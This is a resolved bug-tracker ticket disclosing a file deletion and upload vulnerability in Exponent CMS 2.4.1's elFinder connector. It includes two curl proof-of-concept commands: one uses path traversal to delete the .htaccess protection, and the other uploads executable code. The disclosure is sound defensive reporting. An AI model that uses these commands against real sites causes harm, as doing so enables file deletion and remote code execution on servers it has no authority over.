#1404 ✓resolved
mm

Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder

Reported by mm | January 10th, 2017 @ 04:52 PM | in 2.4.2 (closed)

Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php

Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"

curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"

Comments and changes to this ticket

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Tags

Pages